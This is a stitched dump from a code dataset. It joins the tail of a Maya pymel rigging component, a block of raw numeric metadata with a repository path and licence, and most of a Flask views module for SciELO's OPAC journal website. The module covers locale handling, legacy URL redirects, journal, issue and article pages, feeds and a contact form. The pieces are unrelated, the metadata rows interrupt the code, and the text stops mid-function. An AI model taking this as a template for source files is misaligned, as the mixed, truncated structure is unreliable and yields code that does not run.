# If the parent component hasn't been generated we skip the connection
if self.parent_comp is None:
return
pm.connectAttr(self.parent_comp.blend_att, self.blend_att)
pm.parent(self.root, self.parent_comp.ik_ctl)
pm.parent(self.parent_comp.ik_ref, self.bk_ctl[-1])
pm.parentConstraint(
self.parent_comp.tws3_rot, self.fk_ref, maintainOffset=True
)
cns = pm.scaleConstraint(
self.parent_comp.fk_ref,
self.parent_comp.ik_ref,
self.fk_ref,
wal=True,
)
bc_node = pm.createNode("blendColors")
pm.connectAttr(
bc_node.outputB, cns + ".%sW0" % self.parent_comp.fk_ref
)
pm.connectAttr(
bc_node.outputR, cns + ".%sW1" % self.parent_comp.ik_ref
)
pm.connectAttr(self.parent_comp.blend_att, bc_node.blender)
return
def connect_leg_3jnt_01(self):
"""Connector for leg 3jnt"""
# If the parent component hasn't been generated we skip the connection
if self.parent_comp is None:
return
pm.connectAttr(self.parent_comp.blend_att, self.blend_att)
pm.parent(self.root, self.parent_comp.ik_ctl)
pm.parent(self.parent_comp.ik_ref, self.bk_ctl[-1])
pm.parent(self.parent_comp.ik2b_ikCtl_ref, self.bk_ctl[-1])
pm.parentConstraint(
self.parent_comp.tws3_rot, self.fk_ref, maintainOffset=True
)
return
| 33.865702
| 79
| 0.505887
| 1,809
| 16,391
| 4.408513
| 0.156993
| 0.017555
| 0.036865
| 0.010031
| 0.424702
| 0.333041
| 0.244765
| 0.217053
| 0.217053
| 0.2
| 0
| 0.014341
| 0.336343
| 16,391
| 483
| 80
| 33.935818
| 0.71879
| 0.119944
| 0
| 0.272727
| 0
| 0
| 0.042153
| 0.001957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022727
| false
| 0
| 0.017045
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
714e74c6035390e31e82cb8cc61f9783ca761b5f
| 58,939
|
py
|
Python
|
opac/webapp/main/views.py
|
rafaelpezzuto/opac
|
9b54202350e262a27cb9cb756a892185b288df24
|
[
"BSD-2-Clause"
] | null | null | null |
opac/webapp/main/views.py
|
rafaelpezzuto/opac
|
9b54202350e262a27cb9cb756a892185b288df24
|
[
"BSD-2-Clause"
] | null | null | null |
opac/webapp/main/views.py
|
rafaelpezzuto/opac
|
9b54202350e262a27cb9cb756a892185b288df24
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
import logging
import requests
import mimetypes
from io import BytesIO
from urllib.parse import urlparse
from datetime import datetime, timedelta
from collections import OrderedDict
from flask_babelex import gettext as _
from flask import (
render_template,
abort,
current_app,
request,
session,
redirect,
jsonify,
url_for,
Response,
send_from_directory,
g,
make_response,
)
from werkzeug.contrib.atom import AtomFeed
from urllib.parse import urljoin
from legendarium.formatter import descriptive_short_format
from . import main
from webapp import babel
from webapp import cache
from webapp import controllers
from webapp.choices import STUDY_AREAS
from webapp.utils import utils
from webapp.utils.caching import cache_key_with_lang, cache_key_with_lang_with_qs
from webapp import forms
from webapp.config.lang_names import display_original_lang_name
from opac_schema.v1.models import Journal, Issue, Article, Collection
from lxml import etree
from packtools import HTMLGenerator
logger = logging.getLogger(__name__)
JOURNAL_UNPUBLISH = _("O periódico está indisponível por motivo de: ")
ISSUE_UNPUBLISH = _("O número está indisponível por motivo de: ")
ARTICLE_UNPUBLISH = _("O artigo está indisponível por motivo de: ")
IAHX_LANGS = dict(
p='pt',
e='es',
i='en',
)
def url_external(endpoint, **kwargs):
url = url_for(endpoint, **kwargs)
return urljoin(request.url_root, url)
class RetryableError(Exception):
"""Erro recuperável sem que seja necessário modificar o estado dos dados
na parte cliente, e.g., timeouts, erros advindos de particionamento de rede
etc.
"""
class NonRetryableError(Exception):
"""Erro do qual não pode ser recuperado sem modificar o estado dos dados
na parte cliente, e.g., recurso solicitado não exite, URI inválida etc.
"""
def fetch_data(url: str, timeout: float = 2) -> bytes:
try:
response = requests.get(url, timeout=timeout)
except (requests.ConnectionError, requests.Timeout) as exc:
raise RetryableError(exc) from exc
except (requests.InvalidSchema, requests.MissingSchema, requests.InvalidURL) as exc:
raise NonRetryableError(exc) from exc
else:
try:
response.raise_for_status()
except requests.HTTPError as exc:
if 400 <= exc.response.status_code < 500:
raise NonRetryableError(exc) from exc
elif 500 <= exc.response.status_code < 600:
raise RetryableError(exc) from exc
else:
raise
return response.content
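# Added illustrative sketch (not part of the original module): one way a
# caller could retry ``fetch_data`` on RetryableError. The helper name,
# attempt count and delay are assumptions for illustration only.
def fetch_data_with_retries(url: str, attempts: int = 3, delay: float = 0.5) -> bytes:
    import time  # local import so the sketch stays self-contained
    for attempt in range(attempts):
        try:
            return fetch_data(url)
        except RetryableError:
            if attempt == attempts - 1:
                raise
            time.sleep(delay)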
@main.before_app_request
def add_collection_to_g():
if not hasattr(g, 'collection'):
try:
collection = controllers.get_current_collection()
setattr(g, 'collection', collection)
except Exception:
# discuss what to do here
setattr(g, 'collection', {})
@main.after_request
def add_header(response):
response.headers['x-content-type-options'] = 'nosniff'
return response
@main.after_request
def add_language_code(response):
language = session.get('lang', get_locale())
response.set_cookie('language', language)
return response
@main.before_app_request
def add_forms_to_g():
setattr(g, 'email_share', forms.EmailShareForm())
setattr(g, 'email_contact', forms.ContactForm())
setattr(g, 'error', forms.ErrorForm())
@main.before_app_request
def add_scielo_org_config_to_g():
language = session.get('lang', get_locale())
scielo_org_links = {
key: url[language]
for key, url in current_app.config.get('SCIELO_ORG_URIS', {}).items()
}
setattr(g, 'scielo_org', scielo_org_links)
@babel.localeselector
def get_locale():
langs = current_app.config.get('LANGUAGES')
lang_from_headers = request.accept_languages.best_match(list(langs.keys()))
if 'lang' not in list(session.keys()):
session['lang'] = lang_from_headers
if not lang_from_headers and not session['lang']:
# If the language cannot be detected and we do not have the 'lang' key
# in the session, fall back to the default locale.
session['lang'] = current_app.config.get('BABEL_DEFAULT_LOCALE')
return session['lang']
@main.route('/set_locale/<string:lang_code>/')
def set_locale(lang_code):
langs = current_app.config.get('LANGUAGES')
if lang_code not in list(langs.keys()):
abort(400, _('Código de idioma inválido'))
referrer = request.referrer
hash = request.args.get('hash')
if hash:
referrer += "#" + hash
# store the lang code in the session
session['lang'] = lang_code
return redirect(referrer)
def get_lang_from_session():
"""
Try to return the language stored in the session; if that is not possible,
return BABEL_DEFAULT_LOCALE.
"""
try:
return session['lang']
except KeyError:
return current_app.config.get('BABEL_DEFAULT_LOCALE')
@main.route('/')
@cache.cached(key_prefix=cache_key_with_lang)
def index():
language = session.get('lang', get_locale())
news = controllers.get_latest_news_by_lang(language)
tweets = controllers.get_collection_tweets()
press_releases = controllers.get_press_releases({'language': language})
urls = {
'downloads': '{0}/w/accesses?collection={1}'.format(
current_app.config['METRICS_URL'],
current_app.config['OPAC_COLLECTION']),
'references': '{0}/w/publication/size?collection={1}'.format(
current_app.config['METRICS_URL'],
current_app.config['OPAC_COLLECTION']),
'other': '{0}/?collection={1}'.format(
current_app.config['METRICS_URL'],
current_app.config['OPAC_COLLECTION'])
}
if (
g.collection is not None
and isinstance(g.collection, Collection)
and g.collection.metrics is not None
and current_app.config['USE_HOME_METRICS']
):
g.collection.metrics.total_journal = Journal.objects.filter(
is_public=True, current_status="current"
).count()
g.collection.metrics.total_article = Article.objects.filter(
is_public=True
).count()
context = {
'news': news,
'urls': urls,
'tweets': tweets,
'press_releases': press_releases,
}
return render_template("collection/index.html", **context)
# ##################################Collection###################################
@main.route('/journals/alpha')
@cache.cached(key_prefix=cache_key_with_lang)
def collection_list():
allowed_filters = ["current", "no-current", ""]
query_filter = request.args.get("status", "")
if not query_filter in allowed_filters:
query_filter = ""
journals_list = [
controllers.get_journal_json_data(journal)
for journal in controllers.get_journals(query_filter=query_filter)
]
return render_template("collection/list_journal.html",
**{'journals_list': journals_list, 'query_filter': query_filter})
@main.route("/journals/thematic")
@cache.cached(key_prefix=cache_key_with_lang)
def collection_list_thematic():
allowed_query_filters = ["current", "no-current", ""]
allowed_thematic_filters = ["areas", "wos", "publisher"]
thematic_table = {
"areas": "study_areas",
"wos": "subject_categories",
"publisher": "publisher_name",
}
query_filter = request.args.get("status", "")
title_query = request.args.get("query", "")
thematic_filter = request.args.get("filter", "areas")
if not query_filter in allowed_query_filters:
query_filter = ""
if not thematic_filter in allowed_thematic_filters:
thematic_filter = "areas"
lang = get_lang_from_session()[:2].lower()
objects = controllers.get_journals_grouped_by(
thematic_table[thematic_filter],
title_query,
query_filter=query_filter,
lang=lang,
)
return render_template(
"collection/list_thematic.html",
**{"objects": objects, "query_filter": query_filter, "filter": thematic_filter}
)
@main.route('/journals/feed/')
@cache.cached(key_prefix=cache_key_with_lang)
def collection_list_feed():
language = session.get('lang', get_locale())
collection = controllers.get_current_collection()
title = 'SciELO - %s - %s' % (collection.name, _('Últimos periódicos inseridos na coleção'))
subtitle = _('10 últimos periódicos inseridos na coleção %s' % collection.name)
feed = AtomFeed(title,
subtitle=subtitle,
feed_url=request.url, url=request.url_root)
journals = controllers.get_journals_paginated(
title_query='', page=1, order_by='-created', per_page=10)
if not journals.items:
feed.add('Nenhum periódico encontrado',
url=request.url,
updated=datetime.now())
for journal in journals.items:
issues = controllers.get_issues_by_jid(journal.jid, is_public=True)
last_issue = issues[0] if issues else None
articles = []
if last_issue:
articles = controllers.get_articles_by_iid(last_issue.iid,
is_public=True)
result_dict = OrderedDict()
for article in articles:
section = article.get_section_by_lang(language[:2])
result_dict.setdefault(section, [])
result_dict[section].append(article)
context = {
'journal': journal,
'articles': result_dict,
'language': language,
'last_issue': last_issue
}
feed.add(journal.title,
render_template("collection/list_feed_content.html", **context),
content_type='html',
author=journal.publisher_name,
url=url_external('main.journal_detail', url_seg=journal.url_segment),
updated=journal.updated,
published=journal.created)
return feed.get_response()
@main.route("/about/", methods=['GET'])
@main.route('/about/<string:slug_name>', methods=['GET'])
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def about_collection(slug_name=None):
language = session.get('lang', get_locale())
context = {}
page = None
if slug_name:
# a single page was requested
page = controllers.get_page_by_slug_name(slug_name, language)
if not page:
abort(404, _('Página não encontrada'))
context['page'] = page
else:
# not a single page, so it is a list of pages
pages = controllers.get_pages_by_lang(language)
context['pages'] = pages
return render_template("collection/about.html", **context)
# ###################################Journal#####################################
@main.route('/scielo.php/')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def router_legacy():
script_php = request.args.get('script', None)
pid = request.args.get('pid', None)
tlng = request.args.get('tlng', None)
allowed_scripts = [
'sci_serial', 'sci_issuetoc', 'sci_arttext', 'sci_abstract', 'sci_issues', 'sci_pdf'
]
if (script_php is not None) and (script_php in allowed_scripts) and not pid:
# a valid script was provided but no pid: invalid request
abort(400, _(u'Requisição inválida ao tentar acessar o artigo com pid: %s' % pid))
elif script_php and pid:
if script_php == 'sci_serial':
# pid = issn
journal = controllers.get_journal_by_issn(pid)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
return redirect(url_for('main.journal_detail',
url_seg=journal.url_segment), code=301)
elif script_php == 'sci_issuetoc':
issue = controllers.get_issue_by_pid(pid)
if not issue:
abort(404, _('Número não encontrado'))
if not issue.is_public:
abort(404, ISSUE_UNPUBLISH + _(issue.unpublish_reason))
if not issue.journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(issue.journal.unpublish_reason))
if issue.url_segment and "ahead" in issue.url_segment:
return redirect(
url_for('main.aop_toc', url_seg=issue.journal.url_segment), code=301)
return redirect(
url_for(
"main.issue_toc",
url_seg=issue.journal.url_segment,
url_seg_issue=issue.url_segment),
301
)
elif script_php == 'sci_arttext' or script_php == 'sci_abstract':
article = controllers.get_article_by_pid_v2(pid)
if not article:
abort(404, _('Artigo não encontrado'))
# 'abstract' or None (not False, because False would be converted to the string 'False')
part = (script_php == 'sci_abstract' and 'abstract') or None
if tlng not in article.languages:
tlng = article.original_language
return redirect(url_for('main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article.aid,
part=part,
lang=tlng),
code=301)
elif script_php == 'sci_issues':
journal = controllers.get_journal_by_issn(pid)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
return redirect(url_for('main.issue_grid',
url_seg=journal.url_segment), 301)
elif script_php == 'sci_pdf':
# access to the article PDF:
article = controllers.get_article_by_pid_v2(pid)
if not article:
abort(404, _('Artigo não encontrado'))
return redirect(
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article.aid,
format='pdf',
),
code=301
)
else:
abort(400, _(u'Requisição inválida ao tentar acessar o artigo com pid: %s' % pid))
else:
return redirect('/')
@main.route('/<string:journal_seg>')
@main.route('/journal/<string:journal_seg>')
def journal_detail_legacy_url(journal_seg):
return redirect(url_for('main.journal_detail',
url_seg=journal_seg), code=301)
@main.route('/j/<string:url_seg>/')
@cache.cached(key_prefix=cache_key_with_lang)
def journal_detail(url_seg):
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
utils.fix_journal_last_issue(journal)
# TODO: adjust so that only news related to this journal is shown
language = session.get('lang', get_locale())
news = controllers.get_latest_news_by_lang(language)
# Press releases
press_releases = controllers.get_press_releases({
'journal': journal,
'language': language})
# List of sections
# Always keep English for the sections on the journal home page
if journal.last_issue and journal.current_status == "current":
sections = [section for section in journal.last_issue.sections if section.language == 'en']
recent_articles = controllers.get_recent_articles_of_issue(journal.last_issue.iid, is_public=True)
else:
sections = []
recent_articles = []
latest_issue = journal.last_issue
if latest_issue:
latest_issue_legend = descriptive_short_format(
title=journal.title, short_title=journal.short_title,
pubdate=str(latest_issue.year), volume=latest_issue.volume, number=latest_issue.number,
suppl=latest_issue.suppl_text, language=language[:2].lower())
else:
latest_issue_legend = ''
journal_metrics = controllers.get_journal_metrics(journal)
context = {
'journal': journal,
'press_releases': press_releases,
'recent_articles': recent_articles,
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper()) for study_area in journal.study_areas
],
# the first item in the list is the latest issue.
# conditional to check whether issues contains items
'last_issue': latest_issue,
'latest_issue_legend': latest_issue_legend,
'sections': sections if sections else None,
'news': news,
'journal_metrics': journal_metrics
}
return render_template("journal/detail.html", **context)
@main.route('/journal/<string:url_seg>/feed/')
@cache.cached(key_prefix=cache_key_with_lang)
def journal_feed(url_seg):
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
issues = controllers.get_issues_by_jid(journal.jid, is_public=True)
last_issue = issues[0] if issues else None
articles = controllers.get_articles_by_iid(last_issue.iid, is_public=True)
feed = AtomFeed(journal.title,
feed_url=request.url,
url=request.url_root,
subtitle=utils.get_label_issue(last_issue))
feed_language = session.get('lang', get_locale())
feed_language = feed_language[:2].lower()
for article in articles:
# ######### TODO: Review #########
article_lang = feed_language
if feed_language not in article.languages:
article_lang = article.original_language
feed.add(article.title or _('Artigo sem título'),
render_template("issue/feed_content.html", article=article),
content_type='html',
id=article.doi or article.pid,
author=article.authors,
url=url_external('main.article_detail_v3',
url_seg=journal.url_segment,
article_pid_v3=article.aid,
lang=article_lang),
updated=journal.updated,
published=journal.created)
return feed.get_response()
@main.route("/journal/<string:url_seg>/about/", methods=['GET'])
@cache.cached(key_prefix=cache_key_with_lang)
def about_journal(url_seg):
language = session.get('lang', get_locale())
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
latest_issue = utils.fix_journal_last_issue(journal)
if latest_issue:
latest_issue_legend = descriptive_short_format(
title=journal.title, short_title=journal.short_title,
pubdate=str(latest_issue.year), volume=latest_issue.volume, number=latest_issue.number,
suppl=latest_issue.suppl_text, language=language[:2].lower())
else:
latest_issue_legend = None
page = controllers.get_page_by_journal_acron_lang(journal.acronym, language)
context = {
'journal': journal,
'latest_issue_legend': latest_issue_legend,
'last_issue': latest_issue,
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper()) for study_area in journal.study_areas
],
}
if page:
context['content'] = page.content
if page.updated_at:
context['page_updated_at'] = page.updated_at
return render_template("journal/about.html", **context)
@main.route("/journals/search/alpha/ajax/", methods=['GET', ])
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def journals_search_alpha_ajax():
if not request.is_xhr:
abort(400, _('Requisição inválida. Deve ser por ajax'))
query = request.args.get('query', '', type=str)
query_filter = request.args.get('query_filter', '', type=str)
page = request.args.get('page', 1, type=int)
lang = get_lang_from_session()[:2].lower()
response_data = controllers.get_alpha_list_from_paginated_journals(
title_query=query,
query_filter=query_filter,
page=page,
lang=lang)
return jsonify(response_data)
@main.route("/journals/search/group/by/filter/ajax/", methods=['GET'])
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def journals_search_by_theme_ajax():
if not request.is_xhr:
abort(400, _('Requisição inválida. Deve ser por ajax'))
query = request.args.get('query', '', type=str)
query_filter = request.args.get('query_filter', '', type=str)
filter = request.args.get('filter', 'areas', type=str)
lang = get_lang_from_session()[:2].lower()
if filter == 'areas':
objects = controllers.get_journals_grouped_by('study_areas', query, query_filter=query_filter, lang=lang)
elif filter == 'wos':
objects = controllers.get_journals_grouped_by('subject_categories', query, query_filter=query_filter, lang=lang)
elif filter == 'publisher':
objects = controllers.get_journals_grouped_by('publisher_name', query, query_filter=query_filter, lang=lang)
else:
return jsonify({
'error': 401,
'message': _('Parámetro "filter" é inválido, deve ser "areas", "wos" ou "publisher".')
})
return jsonify(objects)
@main.route("/journals/download/<string:list_type>/<string:extension>/", methods=['GET', ])
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def download_journal_list(list_type, extension):
if extension.lower() not in ['csv', 'xls']:
abort(401, _('Parámetro "extension" é inválido, deve ser "csv" ou "xls".'))
elif list_type.lower() not in ['alpha', 'areas', 'wos', 'publisher']:
abort(401, _('Parámetro "list_type" é inválido, deve ser: "alpha", "areas", "wos" ou "publisher".'))
else:
if extension.lower() == 'xls':
mimetype = 'application/vnd.ms-excel'
else:
mimetype = 'text/csv'
query = request.args.get('query', '', type=str)
data = controllers.get_journal_generator_for_csv(list_type=list_type,
title_query=query,
extension=extension.lower())
timestamp = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
filename = 'journals_%s_%s.%s' % (list_type, timestamp, extension)
response = Response(data, mimetype=mimetype)
response.headers['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
@main.route("/<string:url_seg>/contact", methods=['POST'])
def contact(url_seg):
if not request.is_xhr:
abort(403, _('Requisição inválida, deve ser ajax.'))
if utils.is_recaptcha_valid(request):
form = forms.ContactForm(request.form)
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal.enable_contact:
abort(403, _('Periódico não permite envio de email.'))
recipients = journal.editor_email
if form.validate():
sent, message = controllers.send_email_contact(recipients,
form.data['name'],
form.data['your_email'],
form.data['message'])
return jsonify({'sent': sent, 'message': str(message),
'fields': [key for key in form.data.keys()]})
else:
return jsonify({'sent': False, 'message': form.errors,
'fields': [key for key in form.data.keys()]})
else:
abort(400, _('Requisição inválida, captcha inválido.'))
@main.route("/form_contact/<string:url_seg>/", methods=['GET'])
def form_contact(url_seg):
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
context = {
'journal': journal
}
return render_template("journal/includes/contact_form.html", **context)
# ###################################Issue#######################################
@main.route('/grid/<string:url_seg>/')
def issue_grid_legacy(url_seg):
return redirect(url_for('main.issue_grid', url_seg=url_seg), 301)
@main.route('/j/<string:url_seg>/grid')
@cache.cached(key_prefix=cache_key_with_lang)
def issue_grid(url_seg):
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
# session language
language = session.get('lang', get_locale())
# Default ordering of the ``get_issues_by_jid`` function: "-year", "-volume", "-order"
issues_data = controllers.get_issues_for_grid_by_jid(journal.id, is_public=True)
latest_issue = issues_data['last_issue']
if latest_issue:
latest_issue_legend = descriptive_short_format(
title=journal.title, short_title=journal.short_title,
pubdate=str(latest_issue.year), volume=latest_issue.volume, number=latest_issue.number,
suppl=latest_issue.suppl_text, language=language[:2].lower())
else:
latest_issue_legend = None
context = {
'journal': journal,
'last_issue': issues_data['last_issue'],
'latest_issue_legend': latest_issue_legend,
'volume_issue': issues_data['volume_issue'],
'ahead': issues_data['ahead'],
'result_dict': issues_data['ordered_for_grid'],
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper()) for study_area in journal.study_areas
],
}
return render_template("issue/grid.html", **context)
@main.route('/toc/<string:url_seg>/<string:url_seg_issue>/')
def issue_toc_legacy(url_seg, url_seg_issue):
if url_seg_issue and "ahead" in url_seg_issue:
return redirect(url_for('main.aop_toc', url_seg=url_seg), code=301)
return redirect(
url_for('main.issue_toc',
url_seg=url_seg,
url_seg_issue=url_seg_issue),
code=301)
@main.route('/j/<string:url_seg>/i/<string:url_seg_issue>/')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def issue_toc(url_seg, url_seg_issue):
section_filter = None
goto = request.args.get("goto", None, type=str)
if goto not in ("previous", "next"):
goto = None
if goto in (None, "next") and "ahead" in url_seg_issue:
# redirect to `aop_toc`
return redirect(url_for('main.aop_toc', url_seg=url_seg), code=301)
# session language
language = session.get('lang', get_locale())
if current_app.config["FILTER_SECTION_ENABLE"]:
# documents section, if one was selected
section_filter = request.args.get('section', '', type=str).upper()
# fetch the issue
issue = controllers.get_issue_by_url_seg(url_seg, url_seg_issue)
if not issue:
abort(404, _('Número não encontrado'))
if not issue.is_public:
abort(404, ISSUE_UNPUBLISH + _(issue.unpublish_reason))
# fetch the journal
journal = issue.journal
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
# fill in the url_segment of the last_issue
utils.fix_journal_last_issue(journal)
# goto_next_or_previous_issue (redirects)
goto_url = goto_next_or_previous_issue(
issue, request.args.get('goto', None, type=str))
if goto_url:
return redirect(goto_url, code=301)
# fetch the documents
articles = controllers.get_articles_by_iid(issue.iid, is_public=True)
if articles:
# get ALL the sections of the documents in this table of contents
sections = sorted({a.section.upper() for a in articles if a.section})
else:
# get the sections of the documents in this table of contents
sections = []
if current_app.config["FILTER_SECTION_ENABLE"] and section_filter != '':
# keep only the documents of the selected section
articles = [a for a in articles if a.section.upper() == section_filter]
# get the PDF and TEXT versions of each document
has_math_content = False
for article in articles:
article_text_languages = [doc['lang'] for doc in article.htmls]
article_pdf_languages = [(doc['lang'], doc['url']) for doc in article.pdfs]
setattr(article, "article_text_languages", article_text_languages)
setattr(article, "article_pdf_languages", article_pdf_languages)
if 'mml:' in article.title:
has_math_content = True
# get the bibliographic legend
issue_bibliographic_strip = descriptive_short_format(
title=journal.title, short_title=journal.short_title,
pubdate=str(issue.year), volume=issue.volume, number=issue.number,
suppl=issue.suppl_text, language=language[:2].lower())
context = {
'this_page_url': url_for(
'main.issue_toc',
url_seg=url_seg,
url_seg_issue=url_seg_issue),
'has_math_content': has_math_content,
'journal': journal,
'issue': issue,
'issue_bibliographic_strip': issue_bibliographic_strip,
'articles': articles,
'sections': sections,
'section_filter': section_filter,
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper()) for study_area in journal.study_areas
],
'last_issue': journal.last_issue
}
return render_template("issue/toc.html", **context)
def goto_next_or_previous_issue(current_issue, goto_param):
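"""Return the TOC URL of the issue immediately after or before
``current_issue`` (according to ``goto_param``), or None when no redirect
is needed: invalid ``goto_param``, no neighbouring issue, or the neighbour
is the current issue itself."""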
if goto_param not in ["next", "previous"]:
return None
all_issues = list(
controllers.get_issues_by_jid(current_issue.journal.id, is_public=True))
if goto_param == "next":
selected_issue = utils.get_next_issue(all_issues, current_issue)
elif goto_param == "previous":
selected_issue = utils.get_prev_issue(all_issues, current_issue)
if selected_issue in (None, current_issue):
# no redirect needed
return None
try:
url_seg_issue = selected_issue.url_segment
except AttributeError:
return None
else:
return url_for('main.issue_toc',
url_seg=selected_issue.journal.url_segment,
url_seg_issue=url_seg_issue)
def get_next_or_previous_issue(current_issue, goto_param):
if goto_param not in ["next", "previous"]:
return current_issue
all_issues = list(
controllers.get_issues_by_jid(current_issue.journal.id, is_public=True))
if goto_param == "next":
return utils.get_next_issue(all_issues, current_issue)
return utils.get_prev_issue(all_issues, current_issue)
@main.route('/j/<string:url_seg>/aop')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def aop_toc(url_seg):
section_filter = request.args.get('section', '', type=str).upper()
aop_issues = controllers.get_aop_issues(url_seg) or []
if not aop_issues:
abort(404, _('Artigos ahead of print não encontrados'))
goto = request.args.get("goto", None, type=str)
if goto == "previous":
url = goto_next_or_previous_issue(aop_issues[-1], goto)
if url:
return redirect(url, code=301)
journal = aop_issues[0].journal
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
utils.fix_journal_last_issue(journal)
articles = []
for aop_issue in aop_issues:
_articles = controllers.get_articles_by_iid(
aop_issue.iid, is_public=True)
if _articles:
articles.extend(_articles)
if not articles:
abort(404, _('Artigos ahead of print não encontrados'))
sections = sorted({a.section.upper() for a in articles if a.section})
if section_filter != '':
articles = [a for a in articles if a.section.upper() == section_filter]
for article in articles:
article_text_languages = [doc['lang'] for doc in article.htmls]
article_pdf_languages = [(doc['lang'], doc['url']) for doc in article.pdfs]
setattr(article, "article_text_languages", article_text_languages)
setattr(article, "article_pdf_languages", article_pdf_languages)
context = {
'this_page_url': url_for("main.aop_toc", url_seg=url_seg),
'journal': journal,
'issue': aop_issues[0],
'issue_bibliographic_strip': "ahead of print",
'articles': articles,
'sections': sections,
'section_filter': section_filter,
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper())
for study_area in journal.study_areas
],
# the first item in the list is the latest issue.
'last_issue': journal.last_issue
}
return render_template("issue/toc.html", **context)
@main.route('/feed/<string:url_seg>/<string:url_seg_issue>/')
@cache.cached(key_prefix=cache_key_with_lang)
def issue_feed(url_seg, url_seg_issue):
issue = controllers.get_issue_by_url_seg(url_seg, url_seg_issue)
if not issue:
abort(404, _('Número não encontrado'))
if not issue.is_public:
abort(404, ISSUE_UNPUBLISH + _(issue.unpublish_reason))
if not issue.journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(issue.journal.unpublish_reason))
journal = issue.journal
articles = controllers.get_articles_by_iid(issue.iid, is_public=True)
feed = AtomFeed(journal.title or "",
feed_url=request.url,
url=request.url_root,
subtitle=utils.get_label_issue(issue))
feed_language = session.get('lang', get_locale())
for article in articles:
# ######### TODO: Review #########
article_lang = feed_language
if feed_language not in article.languages:
article_lang = article.original_language
feed.add(article.title or 'Unknown title',
render_template("issue/feed_content.html", article=article),
content_type='html',
author=article.authors,
id=article.doi or article.pid,
url=url_external('main.article_detail_v3',
url_seg=journal.url_segment,
article_pid_v3=article.aid,
lang=article_lang),
updated=journal.updated,
published=journal.created)
return feed.get_response()
# ##################################Article######################################
@main.route('/article/<regex("S\d{4}-\d{3}[0-9xX][0-2][0-9]{3}\d{4}\d{5}"):pid>/')
@cache.cached(key_prefix=cache_key_with_lang)
def article_detail_pid(pid):
article = controllers.get_article_by_pid(pid)
if not article:
article = controllers.get_article_by_oap_pid(pid)
if not article:
abort(404, _('Artigo não encontrado'))
return redirect(url_for('main.article_detail_v3',
url_seg=article.journal.acronym,
article_pid_v3=article.aid))
def render_html_from_xml(article, lang, gs_abstract=False):
logger.debug("Get XML: %s", article.xml)
if current_app.config["SSM_XML_URL_REWRITE"]:
result = fetch_data(use_ssm_url(article.xml))
else:
result = fetch_data(article.xml)
xml = etree.parse(BytesIO(result))
generator = HTMLGenerator.parse(
xml, valid_only=False, gs_abstract=gs_abstract, output_style="website")
return generator.generate(lang), generator.languages
def render_html_from_html(article, lang):
html_url = [html
for html in article.htmls
if html['lang'] == lang]
try:
html_url = html_url[0]['url']
except IndexError:
raise ValueError('Artigo não encontrado') from None
result = fetch_data(use_ssm_url(html_url))
html = result.decode('utf8')
text_languages = [html['lang'] for html in article.htmls]
return html, text_languages
def render_html_abstract(article, lang):
abstract_text = ''
for abstract in article.abstracts:
if abstract['language'] == lang:
abstract_text = abstract["text"]
break
return abstract_text, article.abstract_languages
def render_html(article, lang, gs_abstract=False):
if article.xml:
return render_html_from_xml(article, lang, gs_abstract)
elif article.htmls:
if gs_abstract:
return render_html_abstract(article, lang)
return render_html_from_html(article, lang)
else:
# TODO: fix the tests that expect the ``htmls`` attribute to exist.
# Ideally a ValueError would be raised here.
return '', []
# TODO: remove as soon as the Article.xml value is consistent in the
# database
def use_ssm_url(url):
"""Normaliza a string `url` de acordo com os valores das diretivas de
configuração OPAC_SSM_SCHEME, OPAC_SSM_DOMAIN e OPAC_SSM_PORT.
A normalização busca obter uma URL absoluta em função de uma relativa, ou
uma absoluta em função de uma absoluta, mas com as partes *scheme* e
*authority* trocadas pelas definidas nas diretivas citadas anteriormente.
Este código deve ser removido assim que o valor de Article.xml estiver
consistente, i.e., todos os registros possuirem apenas URLs absolutas.
"""
if url.startswith("http"):
parsed_url = urlparse(url)
return current_app.config["SSM_BASE_URI"] + parsed_url.path
else:
